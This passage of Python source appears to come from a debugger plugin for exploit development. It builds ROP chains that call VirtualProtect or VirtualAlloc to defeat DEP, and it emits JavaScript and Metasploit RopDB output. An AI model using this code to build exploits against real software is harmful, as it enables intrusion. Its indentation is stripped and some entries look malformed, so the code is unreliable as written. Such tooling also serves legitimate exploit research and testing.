vplogtxt += " ];\n"
vplogtxt += " return rop_gadgets;\n"
vplogtxt += " }\n\n"
vplogtxt += " function gadgets2uni(gadgets) {\n"
vplogtxt += " var uni = \"\";\n"
vplogtxt += " for(var i=0;i<gadgets.length;i++){\n"
vplogtxt += " uni += d2u(gadgets[i]);\n"
vplogtxt += " }\n"
vplogtxt += " return uni;\n"
vplogtxt += " }\n\n"
vplogtxt += " function d2u(dword) {\n"
vplogtxt += " var uni = String.fromCharCode(dword & 0xFFFF);\n"
vplogtxt += " uni += String.fromCharCode(dword>>16);\n"
vplogtxt += " return uni;\n"
vplogtxt += " }\n\n"
vplogtxt += "%s" % vplogtxtjs
vplogtxt += "\n var rop_chain = gadgets2uni(get_rop_chain(%s));\n\n" % argtxtjs
vplogtxt += '\n--------------------------------------------------------------------------------------------------\n\n'
# MSF RopDB XML Format - spit out if only one module was selected
if len(modused) == 1:
modulename = ""
for modname in modused:
modulename = modname
objMod = MnModule(modulename)
modversion = objMod.moduleVersion
modbase = objMod.moduleBase
ropdb = '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
ropdb += "<db>\n<rop>\n"
ropdb += " <compatibility>\n"
ropdb += " <target>%s</target>\n" % modversion
ropdb += " </compatibility>\n\n"
ropdb += ' <gadgets base="0x%s">\n' % toHex(modbase)
ropdb += ropdbchain.replace('[' + modulename + ']','').replace('&','').replace('[IAT ' + modulename + ']','')
ropdb += ' </gadgets>\n'
ropdb += '</rop>\n</db>'
# write to file if needed
shortmodname = modulename.replace(".dll","")
ignoremodules = True
if ropdbchain.lower().find("virtualprotect") > -1:
ofile = MnLog(shortmodname+"_virtualprotect.xml")
thisofile = ofile.reset(showheader = False)
ofile.write(ropdb,thisofile)
if ropdbchain.lower().find("virtualalloc") > -1:
ofile = MnLog(shortmodname+"_virtualalloc.xml")
thisofile = ofile.reset(showheader = False)
ofile.write(ropdb,thisofile)
ignoremodules = False
#go to the next one
vpfile = MnLog("rop_chains.txt")
thisvplog = vpfile.reset()
vpfile.write(vplogtxt,thisvplog)
dbg.log("[+] ROP chains written to file %s" % thisvplog)
objprogressfile.write("Done creating rop chains",progressfile)
return vplogtxt
def getRegImpact(instructionstr):
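# parses the instruction string (split on " # ") and returns a dict mapping each register
# that is touched by an ADD/SUB/ADC/INC/DEC/XOR to the accumulated adjustment value found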
rimpact = {}
instrlineparts = instructionstr.split(" # ")
changers = ["ADD","SUB","ADC","INC","DEC","XOR"]
for i in instrlineparts:
instrparts = i.split(" ")
dreg = ""
dval = 0
if len(instrparts) > 1:
if instrparts[0] in changers:
dreg = instrparts[1]
if instrparts[0] == "INC":
dval = -1
elif instrparts[0] == "DEC":
dval = 1
else:
vparts = i.split(",")
if len(vparts) > 1:
vpart = vparts[1]
dval = vpart
if dreg != "":
if not dreg in rimpact:
rimpact[dreg] = dval
else:
rimpact[dreg] = rimpact[dreg] + dval
return rimpact
def getPickupGadget(targetreg,targetval,freetext,suggestions,interestinggadgets,criteria,modulecriteria,routine=""):
"""
Will attempt to find gadgets that pick up (dereference) a pointer to pointer and leave the result in the desired register
Arguments : the destination register, the value to pick up, some free text about the value,
the suggestions and interestinggadgets dictionaries, pointer/module criteria and (optionally) the name of the API routine
Returns :
an array with the chain entries ([pointer, text, junksize]) and a list of registers the caller should skip / handle last
"""
shortest_pickup = 0
thisshortest_pickup = 0
shortest_move = 0
popptr = 0
pickupfrom = ""
pickupreg = ""
pickupfound = False
pickupchain = []
movechain = []
movechain1 = []
movechain2 = []
disablelist = []
allregs = ["eax","ebx","ecx","edx","ebp","esi","edi"]
for pickuptypes in suggestions:
if pickuptypes.find("pickup pointer into " + targetreg) > -1:
thisshortest_pickup = getShortestGadget(suggestions[pickuptypes])
if shortest_pickup == 0 or (thisshortest_pickup != 0 and thisshortest_pickup < shortest_pickup):
shortest_pickup = thisshortest_pickup
smallparts = pickuptypes.split(" ")
pickupreg = smallparts[len(smallparts)-1].lower()
parts2 = interestinggadgets[shortest_pickup].split("#")
#parts2[0] is empty
smallparts = parts2[1].split("[")
smallparts2 = smallparts[1].split("]")
pickupfrom = smallparts2[0].lower()
pickupfound = True
if (pickupfrom.find("+") > -1):
pickupfields = pickupfrom.split("+")
if pickupfields[1].lower() in allregs:
pickupfound = False
shortest_pickup = 0
if (pickupfrom.find("-") > -1):
pickupfields = pickupfrom.split("-")
if pickupfields[1].lower() in allregs:
pickupfound = False
shortest_pickup = 0
if shortest_pickup == 0:
# no direct pickup, look for indirect pickup, but prefer EAX first
for movetypes in suggestions:
if movetypes.find("move eax") == 0 and movetypes.endswith("-> " + targetreg):
typeparts = movetypes.split(" ")
movefrom = "eax"
shortest_move = getShortestGadget(suggestions[movetypes])
movechain = getGadgetMoveRegToReg(movefrom,targetreg,suggestions,interestinggadgets)
for pickuptypes in suggestions:
if pickuptypes.find("pickup pointer into " + movefrom) > -1:
thisshortest_pickup = getShortestGadget(suggestions[pickuptypes])
if shortest_pickup == 0 or (thisshortest_pickup != 0 and thisshortest_pickup < shortest_pickup):
shortest_pickup = thisshortest_pickup
smallparts = pickuptypes.split(" ")
pickupreg = smallparts[len(smallparts)-1].lower()
parts2 = interestinggadgets[shortest_pickup].split("#")
#parts2[0] is empty
smallparts = parts2[1].split("[")
smallparts2 = smallparts[1].split("]")
pickupfrom = smallparts2[0].lower()
pickupfound = True
if (pickupfrom.find("+") > -1):
pickupfields = pickupfrom.split("+")
if pickupfields[1].lower() in allregs:
pickupfound = False
shortest_pickup = 0
if (pickupfrom.find("-") > -1):
pickupfields = pickupfrom.split("-")
if pickupfields[1].lower() in allregs:
pickupfound = False
shortest_pickup = 0
if pickupfound:
break
if shortest_pickup == 0:
# no direct pickup, look for indirect pickup
for movetypes in suggestions:
if movetypes.find("move") == 0 and movetypes.endswith("-> " + targetreg):
typeparts = movetypes.split(" ")
movefrom = typeparts[1]
if movefrom != "esp":
shortest_move = getShortestGadget(suggestions[movetypes])
movechain = getGadgetMoveRegToReg(movefrom,targetreg,suggestions,interestinggadgets)
for pickuptypes in suggestions:
if pickuptypes.find("pickup pointer into " + movefrom) > -1:
thisshortest_pickup = getShortestGadget(suggestions[pickuptypes])
if shortest_pickup == 0 or (thisshortest_pickup != 0 and thisshortest_pickup < shortest_pickup):
shortest_pickup = thisshortest_pickup
smallparts = pickuptypes.split(" ")
pickupreg = smallparts[len(smallparts)-1].lower()
parts2 = interestinggadgets[shortest_pickup].split("#")
#parts2[0] is empty
smallparts = parts2[1].split("[")
smallparts2 = smallparts[1].split("]")
pickupfrom = smallparts2[0].lower()
pickupfound = True
if (pickupfrom.find("+") > -1):
pickupfields = pickupfrom.split("+")
if pickupfields[1].lower() in allregs:
pickupfound = False
shortest_pickup = 0
if (pickupfrom.find("-") > -1):
pickupfields = pickupfrom.split("-")
if pickupfields[1].lower() in allregs:
pickupfound = False
shortest_pickup = 0
if pickupfound:
break
if shortest_pickup == 0:
movechain = []
#double move
for movetype1 in suggestions:
if movetype1.find("move") == 0 and movetype1.endswith("-> " + targetreg):
interimreg = movetype1.split(" ")[1]
if interimreg != "esp":
for movetype2 in suggestions:
if movetype2.find("move") == 0 and movetype2.endswith("-> " + interimreg):
topickupreg= movetype2.split(" ")[1]
if topickupreg != "esp":
move1 = getShortestGadget(suggestions[movetype1])
move2 = getShortestGadget(suggestions[movetype2])
for pickuptypes in suggestions:
if pickuptypes.find("pickup pointer into " + topickupreg) > -1:
thisshortest_pickup = getShortestGadget(suggestions[pickuptypes])
if shortest_pickup == 0 or (thisshortest_pickup != 0 and thisshortest_pickup < shortest_pickup):
shortest_pickup = thisshortest_pickup
smallparts = pickuptypes.split(" ")
pickupreg = smallparts[len(smallparts)-1].lower()
parts2 = interestinggadgets[shortest_pickup].split("#")
#parts2[0] is empty
smallparts = parts2[1].split("[")
smallparts2 = smallparts[1].split("]")
pickupfrom = smallparts2[0].lower()
pickupfound = True
if (pickupfrom.find("+") > -1):
pickupfields = pickupfrom.split("+")
if pickupfields[1].lower() in allregs:
pickupfound = False
shortest_pickup = 0
if (pickupfrom.find("-") > -1):
pickupfields = pickupfrom.split("-")
if pickupfields[1].lower() in allregs:
pickupfound = False
shortest_pickup = 0
if pickupfound:
movechain = []
movechain1 = getGadgetMoveRegToReg(interimreg,targetreg,suggestions,interestinggadgets)
movechain2 = getGadgetMoveRegToReg(topickupreg,interimreg,suggestions,interestinggadgets)
break
if shortest_pickup > 0:
# put a value in a register
if targetval > 0:
poproutine = putValueInReg(pickupfrom,targetval,freetext,suggestions,interestinggadgets,criteria)
for popsteps in poproutine:
pickupchain.append([popsteps[0],popsteps[1],popsteps[2]])
else:
pickupchain.append([0,"[-] Unable to find API pointer -> " + pickupfrom,0])
# pickup
junksize = getJunk(interestinggadgets[shortest_pickup])
pickupchain.append([shortest_pickup,"",junksize])
# move if needed
if len(movechain) > 0:
for movesteps in movechain:
pickupchain.append([movesteps[0],movesteps[1],movesteps[2]])
if len(movechain2) > 0:
for movesteps in movechain2:
pickupchain.append([movesteps[0],movesteps[1],movesteps[2]])
if len(movechain1) > 0:
for movesteps in movechain1:
pickupchain.append([movesteps[0],movesteps[1],movesteps[2]])
elif (routine.lower() == "virtualalloc" or routine.lower() == "virtualprotect"):
# use alternative technique, in case of virtualprotect/virtualalloc routine
if "pop " + targetreg in suggestions and "pop eax" in suggestions:
# find a jmp [eax]
pattern = "jmp [eax]"
base = 0
top = TOP_USERLAND
type = "instr"
al = criteria["accesslevel"]
criteria["accesslevel"] = "X"
global ptr_to_get
global ptr_counter
ptr_counter = 0
ptr_to_get = 5
theptr = 0
global silent
oldsilent = silent
silent=True
allpointers = findPattern(modulecriteria,criteria,pattern,type,base,top)
silent = oldsilent
criteria["accesslevel"] = al
thismodname = ""
if len(allpointers) > 0:
for ptrtype in allpointers:
for ptrs in allpointers[ptrtype]:
theptr = ptrs
thismodname = MnPointer(theptr).belongsTo()
break
if theptr > 0:
popptrtar = getShortestGadget(suggestions["pop "+targetreg])
popptreax = getShortestGadget(suggestions["pop eax"])
junksize = getJunk(interestinggadgets[popptrtar])-4
pickupchain.append([popptrtar,"",junksize])
pickupchain.append([theptr,"JMP [EAX] [" + thismodname + "]",0])
junksize = getJunk(interestinggadgets[popptreax])-4
pickupchain.append([popptreax,"",junksize])
pickupchain.append([targetval,freetext,0])
disablelist.append("eax")
pickupfound = True
if not pickupfound:
pickupchain.append([0,"[-] Unable to find gadgets to pickup the desired API pointer into " + targetreg,0])
pickupchain.append([targetval,freetext,0])
return pickupchain,disablelist
def getRopFuncPtr(apiname,modulecriteria,criteria,mode = "iat"):
"""
Will get a pointer to the given API : in "iat" mode a pointer to the IAT entry (pointer to pointer)
in one of the selected modules, in "eat" mode the function address itself (read from the export table)
Arguments :
apiname : the name of the function
modulecriteria & criteria : module/pointer criteria
mode : "iat" (default) or "eat"
Returns :
a pointer (integer value, 0 if no pointer was found)
text describing the pointer (or an error message if nothing was found)
"""
global silent
oldsilent = silent
silent = True
global ptr_to_get
ptr_to_get = -1
rfuncsearch = apiname.lower()
arrfuncsearch = [rfuncsearch]
if rfuncsearch == "virtualloc":
arrfuncsearch.append("virtuallocstub")
ropfuncptr = 0
ropfuncoffsets = {}
ropfunctext = "ptr to &" + apiname + "()"
if mode == "iat":
if rfuncsearch != "":
ropfuncs,ropfuncoffsets = findROPFUNC(modulecriteria,criteria, [rfuncsearch])
else:
ropfuncs,ropfuncoffsets = findROPFUNC(modulecriteria)
silent = oldsilent
#first look for a pointer in a module that is not going to be rebased
#dbg.log("Found %d pointers" % len(ropfuncs))
for ropfunctypes in ropfuncs:
#dbg.log("%s %s" % (ropfunctypes, rfuncsearch))
if ropfunctypes.lower().find(rfuncsearch) > -1 and ropfunctypes.lower().find("rebased") == -1:
ropfuncptr = ropfuncs[ropfunctypes][0]
break
if ropfuncptr == 0:
for ropfunctypes in ropfuncs:
if ropfunctypes.lower().find(rfuncsearch) > -1:
ropfuncptr = ropfuncs[ropfunctypes][0]
break
#dbg.log("Selected pointer: 0x%08x" % ropfuncptr)
#still haven't found ? clear out modulecriteria, include ASLR/rebase modules (but not OS modules)
if ropfuncptr == 0:
oldsilent = silent
silent = True
limitedmodulecriteria = {}
# search in anything except known OS modules - bad idea anyway
limitedmodulecriteria["os"] = False
ropfuncs2,ropfuncoffsets2 = findROPFUNC(limitedmodulecriteria,criteria)
silent = oldsilent
for ropfunctypes in ropfuncs2:
if ropfunctypes.lower().find(rfuncsearch) > -1 and ropfunctypes.lower().find("rebased") == -1:
ropfuncptr = ropfuncs2[ropfunctypes][0]
ropfunctext += " (skipped module criteria, check if pointer is reliable !)"
break
if ropfuncptr == 0:
ropfunctext = "[-] Unable to find ptr to &" + apiname+"()"
else:
ropfunctext += " [IAT " + MnPointer(ropfuncptr).belongsTo() + "]"
else:
# read EAT
modulestosearch = getModulesToQuery(modulecriteria)
for mod in modulestosearch:
tmod = MnModule(mod)
funcs = tmod.getEAT()
for func in funcs:
funcname = funcs[func].lower()
if funcname.find(rfuncsearch) > -1:
ropfuncptr = func
break
if ropfuncptr == 0:
ropfunctext = "[-] Unable to find required API pointer"
return ropfuncptr,ropfunctext
def putValueInReg(reg,value,freetext,suggestions,interestinggadgets,criteria):
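# builds a list of [pointer, text, junksize] entries that load 'value' into 'reg'
# strategies, in order of preference : a direct POP (or a POP into another register followed by
# a move), the NEG trick when the value itself contains bad characters, ADD/SUB/ADC/XOR delta
# gadgets, NEG combined with a series of INC/DEC gadgets, and finally clearing the register and
# INCing it up to the value (only for small values <= 64)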
putchain = []
allownull = True
popptr = 0
gadgetfound = False
offset = 0
if "+" in reg:
try:
rval = reg.split("+")[1].strip("h")
offset = int(rval,16) * (-1)
reg = reg.split("+")[0]
except:
reg = reg.split("+")[0]
offset = 0
elif "-" in reg:
try:
rval = reg.split("-")[1].strip("h")
offset = int(rval,16)
reg = reg.split("-")[0]
except:
reg = reg.split("-")[0]
offset = 0
if value != 0:
value = value + offset
if value < 0:
value = 0xffffffff + value + 1
negvalue = 4294967296 - value
ptrval = MnPointer(value)
if meetsCriteria(ptrval,criteria):
# easy way - just pop it into a register
for poptype in suggestions:
if poptype.find("pop "+reg) == 0:
popptr = getShortestGadget(suggestions[poptype])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([value,freetext,0])
gadgetfound = True
break
if not gadgetfound:
# move
for movetype in suggestions:
if movetype.startswith("move") and movetype.endswith("-> " + reg):
# get "from" reg
fromreg = movetype.split(" ")[1].lower()
for poptype in suggestions:
if poptype.find("pop "+fromreg) == 0:
popptr = getShortestGadget(suggestions[poptype])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([value,freetext,0])
moveptr = getShortestGadget(suggestions[movetype])
movechain = getGadgetMoveRegToReg(fromreg,reg,suggestions,interestinggadgets)
for movesteps in movechain:
putchain.append([movesteps[0],movesteps[1],movesteps[2]])
gadgetfound = True
break
if gadgetfound:
break
if not gadgetfound or not meetsCriteria(ptrval,criteria):
if meetsCriteria(MnPointer(negvalue),criteria):
if "pop " + reg in suggestions and "neg "+reg in suggestions:
popptr = getShortestGadget(suggestions["pop "+reg])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([negvalue,"Value to negate, will become 0x" + toHex(value),0])
negptr = getShortestGadget(suggestions["neg "+reg])
junksize = getJunk(interestinggadgets[negptr])
putchain.append([negptr,"",junksize])
gadgetfound = True
if not gadgetfound:
for movetype in suggestions:
if movetype.startswith("move") and movetype.endswith("-> " + reg):
fromreg = movetype.split(" ")[1]
if "pop " + fromreg in suggestions and "neg " + fromreg in suggestions:
popptr = getShortestGadget(suggestions["pop "+fromreg])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([negvalue,"Value to negate, will become 0x" + toHex(value)])
negptr = getShortestGadget(suggestions["neg "+fromreg])
junksize = getJunk(interestinggadgets[negptr])
putchain.append([negptr,"",junksize])
movechain = getGadgetMoveRegToReg(fromreg,reg,suggestions,interestinggadgets)
for movesteps in movechain:
putchain.append([movesteps[0],movesteps[1],movesteps[2]])
gadgetfound = True
break
if not gadgetfound:
# can we do this using add/sub via another register ?
for movetype in suggestions:
if movetype.startswith("move") and movetype.endswith("-> " + reg):
fromreg = movetype.split(" ")[1]
if "pop "+ fromreg in suggestions and "add value to " + fromreg in suggestions:
# check each value & see if delta meets pointer criteria
#dbg.log("move %s into %s" % (fromreg,reg))
for addinstr in suggestions["add value to " + fromreg]:
if not gadgetfound:
theinstr = interestinggadgets[addinstr][3:len(interestinggadgets[addinstr])]
#dbg.log("%s" % theinstr)
instrparts = theinstr.split("#")
totalvalue = 0
#gadget might contain multiple add/sub instructions
for indivinstr in instrparts:
instrvalueparts = indivinstr.split(',')
if len(instrvalueparts) > 1:
# only look at real values
if isHexValue(instrvalueparts[1].rstrip()):
thisval = hexStrToInt(instrvalueparts[1])
if instrvalueparts[0].lstrip().startswith("ADD"):
totalvalue += thisval
if instrvalueparts[0].lstrip().startswith("SUB"):
totalvalue -= thisval
# subtract totalvalue from target value
if totalvalue > 0:
deltaval = value - totalvalue
if deltaval < 0:
deltaval = 0xffffffff + deltaval + 1
deltavalhex = toHex(deltaval)
if meetsCriteria(MnPointer(deltaval),criteria):
#dbg.log(" Instruction : %s, Delta : %s, To pop in reg : %s" % (theinstr,toHex(totalvalue),deltavalhex),highlight=1)
popptr = getShortestGadget(suggestions["pop "+fromreg])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([deltaval,"put delta into " + fromreg + " (-> put 0x" + toHex(value) + " into " + reg + ")",0])
junksize = getJunk(interestinggadgets[addinstr])
putchain.append([addinstr,"",junksize])
movptr = getShortestGadget(suggestions["move "+fromreg + " -> " + reg])
junksize = getJunk(interestinggadgets[movptr])
putchain.append([movptr,"",junksize])
gadgetfound = True
if not gadgetfound:
if "pop " + reg in suggestions and "neg "+reg in suggestions and "dec "+reg in suggestions:
toinc = 0
while not meetsCriteria(MnPointer(negvalue-toinc),criteria):
toinc += 1
if toinc > 250:
break
if toinc <= 250:
popptr = getShortestGadget(suggestions["pop "+reg])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([negvalue-toinc,"Value to negate, destination value : 0x" + toHex(value),0])
negptr = getShortestGadget(suggestions["neg "+reg])
cnt = 0
decptr = getShortestGadget(suggestions["dec "+reg])
junksize = getJunk(interestinggadgets[negptr])
putchain.append([negptr,"",junksize])
junksize = getJunk(interestinggadgets[decptr])
while cnt < toinc:
putchain.append([decptr,"",junksize])
cnt += 1
gadgetfound = True
if not gadgetfound:
for movetype in suggestions:
if movetype.startswith("move") and movetype.endswith("-> " + reg):
fromreg = movetype.split(" ")[1]
if "pop " + fromreg in suggestions and "neg " + fromreg in suggestions and "dec "+fromreg in suggestions:
toinc = 0
while not meetsCriteria(MnPointer(negvalue-toinc),criteria):
toinc += 1
if toinc > 250:
break
if toinc <= 250:
popptr = getShortestGadget(suggestions["pop "+fromreg])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([negvalue-toinc,"Value to negate, destination value : 0x" + toHex(value),0])
negptr = getShortestGadget(suggestions["neg "+fromreg])
junksize = getJunk(interestinggadgets[negptr])
cnt = 0
decptr = getShortestGadget(suggestions["dec "+fromreg])
putchain.append([negptr,"",junksize])
junksize = getJunk(interestinggadgets[decptr])
while cnt < toinc:
putchain.append([decptr,"",junksize])
cnt += 1
movechain = getGadgetMoveRegToReg(fromreg,reg,suggestions,interestinggadgets)
for movesteps in movechain:
putchain.append([movesteps[0],movesteps[1],movesteps[2]])
gadgetfound = True
break
if not gadgetfound and "pop " + reg in suggestions and "neg "+reg in suggestions and "inc "+reg in suggestions:
toinc = 0
while not meetsCriteria(MnPointer(negvalue-toinc),criteria):
toinc -= 1
if toinc < -250:
break
if toinc > -250:
popptr = getShortestGadget(suggestions["pop "+reg])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([negvalue-toinc,"Value to negate, destination value : 0x" + toHex(value),0])
negptr = getShortestGadget(suggestions["neg "+reg])
junksize = getJunk(interestinggadgets[negptr])
putchain.append([negptr,"",junksize])
incptr = getShortestGadget(suggestions["inc "+reg])
junksize = getJunk(interestinggadgets[incptr])
while toinc < 0:
putchain.append([incptr,"",junksize])
toinc += 1
gadgetfound = True
if not gadgetfound:
for movetype in suggestions:
if movetype.startswith("move") and movetype.endswith("-> " + reg):
fromreg = movetype.split(" ")[1]
if "pop " + fromreg in suggestions and "neg " + fromreg in suggestions and "inc "+fromreg in suggestions:
toinc = 0
while not meetsCriteria(MnPointer(negvalue-toinc),criteria):
toinc -= 1
if toinc < -250:
break
if toinc > -250:
popptr = getShortestGadget(suggestions["pop "+fromreg])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,""])
putchain.append([negvalue-toinc,"Value to negate, destination value : 0x" + toHex(value)])
negptr = getShortestGadget(suggestions["neg "+fromreg])
junksize = getJunk(interestinggadgets[negptr])
putchain.append([negptr,"",junksize])
incptr = getShortestGadget(suggestions["inc "+fromreg])
junksize = getJunk(interestinggadgets[incptr])
while toinc < 0 :
putchain.append([incptr,"",junksize])
toinc += 1
movechain = getGadgetMoveRegToReg(fromreg,reg,suggestions,interestinggadgets)
for movesteps in movechain:
putchain.append([movesteps[0],movesteps[1],movesteps[2]])
gadgetfound = True
break
if not gadgetfound and "add value to " + reg in suggestions and "pop " + reg in suggestions:
addtypes = ["ADD","ADC","XOR", "SUB"]
for addtype in addtypes:
for ptrs in suggestions["add value to " + reg]:
thisinstr = interestinggadgets[ptrs]
thisparts = thisinstr.split("#")
addinstr = thisparts[1].lstrip().split(",")
if thisparts[1].startswith(addtype):
if addtype == "ADD" or addtype == "ADC":
addvalue = hexStrToInt(addinstr[1])
delta = value - addvalue
if delta < 0:
delta = 0xffffffff + delta + 1
if addtype == "XOR":
delta = hexStrToInt(addinstr[1]) ^ value
if addtype == "SUB":
addvalue = hexStrToInt(addinstr[1])
delta = value + addvalue
if delta < 0:
delta = 0xffffffff + delta + 1
if meetsCriteria(MnPointer(delta),criteria):
popptr = getShortestGadget(suggestions["pop "+reg])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([delta,"Diff to desired value",0])
junksize = getJunk(interestinggadgets[ptrs])
putchain.append([ptrs,"",junksize])
gadgetfound = True
break
if not gadgetfound:
for movetype in suggestions:
if movetype.startswith("move") and movetype.endswith("-> " + reg):
fromreg = movetype.split(" ")[1]
if "add value to " + fromreg in suggestions and "pop " + fromreg in suggestions:
addtypes = ["ADD","ADC","XOR","SUB"]
for addtype in addtypes:
for ptrs in suggestions["add value to " + fromreg]:
thisinstr = interestinggadgets[ptrs]
thisparts = thisinstr.split("#")
addinstr = thisparts[1].lstrip().split(",")
if thisparts[1].startswith(addtype):
if addtype == "ADD" or addtype == "ADC":
addvalue = hexStrToInt(addinstr[1])
delta = value - addvalue
if delta < 0:
delta = 0xffffffff + delta + 1
if addtype == "XOR":
delta = hexStrToInt(addinstr[1]) ^ value
if addtype == "SUB":
addvalue = hexStrToInt(addinstr[1])
delta = value + addvalue
if delta < 0:
delta = 0xffffffff + delta + 1
#dbg.log("0x%s : %s, delta : 0x%s" % (toHex(ptrs),thisinstr,toHex(delta)))
if meetsCriteria(MnPointer(delta),criteria):
popptr = getShortestGadget(suggestions["pop "+fromreg])
junksize = getJunk(interestinggadgets[popptr])-4
putchain.append([popptr,"",junksize])
putchain.append([delta,"Diff to desired value",0])
junksize = getJunk(interestinggadgets[ptrs])
putchain.append([ptrs,"",junksize])
movechain = getGadgetMoveRegToReg(fromreg,reg,suggestions,interestinggadgets)
for movesteps in movechain:
putchain.append([movesteps[0],movesteps[1],movesteps[2]])
gadgetfound = True
break
if not gadgetfound and "inc " + reg in suggestions and value <= 64:
cnt = 0
# can we clear the reg ?
clearsteps = clearReg(reg,suggestions,interestinggadgets)
for cstep in clearsteps:
putchain.append([cstep[0],cstep[1],cstep[2]])
# inc
incptr = getShortestGadget(suggestions["inc "+reg])
junksize = getJunk(interestinggadgets[incptr])
while cnt < value:
putchain.append([incptr,"",junksize])
cnt += 1
gadgetfound = True
if not gadgetfound:
putchain.append([0,"[-] Unable to find gadget to put " + toHex(value) + " into " + reg,0])
return putchain
def getGadgetMoveRegToReg(fromreg,toreg,suggestions,interestinggadgets):
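# returns the chain entries needed to copy 'fromreg' into 'toreg' : move gadgets based on
# XOR/OR/ADD require the destination register to be cleared first; when no direct move gadget
# exists, a pair of XOR gadgets (xor swap) is used as a fallback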
movechain = []
movetype = "move " + fromreg + " -> " + toreg
if movetype in suggestions:
moveptr = getShortestGadget(suggestions[movetype])
moveinstr = interestinggadgets[moveptr].lstrip()
if moveinstr.startswith("# XOR") or moveinstr.startswith("# OR") or moveinstr.startswith("# AD"):
clearchain = clearReg(toreg,suggestions,interestinggadgets)
for cc in clearchain:
movechain.append([cc[0],cc[1],cc[2]])
junksize = getJunk(interestinggadgets[moveptr])
movechain.append([moveptr,"",junksize])
else:
movetype1 = "xor " + fromreg + " -> " + toreg
movetype2 = "xor " + toreg + " -> " + fromreg
if movetype1 in suggestions and movetype2 in suggestions:
moveptr1 = getShortestGadget(suggestions[movetype1])
junksize = getJunk(interestinggadgets[moveptr1])
movechain.append([moveptr1,"",junksize])
moveptr2 = getShortestGadget(suggestions[movetype2])
junksize = getJunk(interestinggadgets[moveptr2])
movechain.append([moveptr2,"",junksize])
return movechain
def clearReg(reg,suggestions,interestinggadgets):
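# returns chain entries that set 'reg' to zero : preferably a dedicated clear gadget,
# otherwise POP 0xFFFFFFFF into the register followed by an INC, and as a last resort
# the same POP/INC trick on another register followed by a move into 'reg'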
clearchain = []
clearfound = False
if not "clear " + reg in suggestions:
if not "inc " + reg in suggestions or not "pop " + reg in suggestions:
# maybe it will work using a move from another register
for inctype in suggestions:
if inctype.startswith("inc"):
increg = inctype.split(" ")[1]
iptr = getShortestGadget(suggestions["inc " + increg])
for movetype in suggestions:
if movetype == "move " + increg + " -> " + reg and "pop " + increg in suggestions:
moveptr = getShortestGadget(suggestions[movetype])
moveinstr = interestinggadgets[moveptr].lstrip()
if not(moveinstr.startswith("# XOR") or moveinstr.startswith("# OR") or moveinstr.startswith("# AD")):
#kewl
pptr = getShortestGadget(suggestions["pop " + increg])
junksize = getJunk(interestinggadgets[pptr])-4
clearchain.append([pptr,"",junksize])
clearchain.append([0xffffffff," ",0])
junksize = getJunk(interestinggadgets[iptr])
clearchain.append([iptr,"",junksize])
junksize = getJunk(interestinggadgets[moveptr])
clearchain.append([moveptr,"",junksize])
clearfound = True
break
if not clearfound:
clearchain.append([0,"[-] Unable to find a gadget to clear " + reg,0])
else:
#pop FFFFFFFF into reg, then do inc reg => 0
pptr = getShortestGadget(suggestions["pop " + reg])
junksize = getJunk(interestinggadgets[pptr])-4
clearchain.append([pptr,"",junksize])
clearchain.append([0xffffffff," ",0])
iptr = getShortestGadget(suggestions["inc " + reg])
junksize = getJunk(interestinggadgets[iptr])
clearchain.append([iptr,"",junksize])
else:
shortest_clear = getShortestGadget(suggestions["clear " + reg])
junksize = getJunk(interestinggadgets[shortest_clear])
clearchain.append([shortest_clear,"",junksize])
return clearchain
def getGadgetValueToReg(reg,value,suggestions,interestinggadgets):
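# text-based variant of putValueInReg : returns a ready-made block of chain text (and the junk
# size) that loads 'value' into 'reg' using the NEG trick, either directly or via another register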
negfound = False
blocktxt = ""
blocktxt2 = ""
tonegate = 4294967296 - value
nregs = ["eax","ebx","ecx","edx","edi"]
junksize = 0
junk2size = 0
negateline = " 0x" + toHex(tonegate)+", # value to negate, target value : 0x" + toHex(value) + ", target reg : " + reg +"\n"
if "neg " + reg in suggestions:
negfound = True
negptr = getShortestGadget(suggestions["neg " + reg])
if "pop "+reg in suggestions:
pptr = getShortestGadget(suggestions["pop " + reg])
blocktxt2 += " 0x" + toHex(pptr)+", "+interestinggadgets[pptr].strip()+" ("+MnPointer(pptr).belongsTo()+")\n"
blocktxt2 += negateline
junk2size = getJunk(interestinggadgets[pptr])-4
else:
blocktxt2 += " 0x????????,# find a way to pop the next value into "+thisreg+"\n"
blocktxt2 += negateline
blocktxt2 += " 0x" + toHex(negptr)+", "+interestinggadgets[negptr].strip()+" ("+MnPointer(negptr).belongsTo()+")\n"
junksize = getJunk(interestinggadgets[negptr])-4
if not negfound:
nregs.remove(reg)
for thisreg in nregs:
if "neg "+ thisreg in suggestions and not negfound:
blocktxt2 = ""
junk2size = 0
negfound = True
#get pop first
if "pop "+thisreg in suggestions:
pptr = getShortestGadget(suggestions["pop " + thisreg])
blocktxt2 += " 0x" + toHex(pptr)+", "+interestinggadgets[pptr].strip()+" ("+MnPointer(pptr).belongsTo()+")\n"
blocktxt2 += negateline
junk2size = getJunk(interestinggadgets[pptr])-4
else:
blocktxt2 += " 0x????????,# find a way to pop the next value into "+thisreg+"\n"
blocktxt2 += negateline
negptr = getShortestGadget(suggestions["neg " + thisreg])
blocktxt2 += " 0x" + toHex(negptr)+", "+interestinggadgets[negptr].strip()+" ("+MnPointer(negptr).belongsTo()+")\n"
junk2size = junk2size + getJunk(interestinggadgets[negptr])-4
#now move it to reg
if "move " + thisreg + " -> " + reg in suggestions:
bptr = getShortestGadget(suggestions["move " + thisreg + " -> " + reg])
if interestinggadgets[bptr].strip().startswith("# ADD"):
if not "clear " + reg in suggestions:
# other way to clear reg, using pop + inc ?
if not "inc " + reg in suggestions or not "pop " + reg in suggestions:
blocktxt2 += " 0x????????, # find pointer to clear " + reg+"\n"
else:
#pop FFFFFFFF into reg, then do inc reg => 0
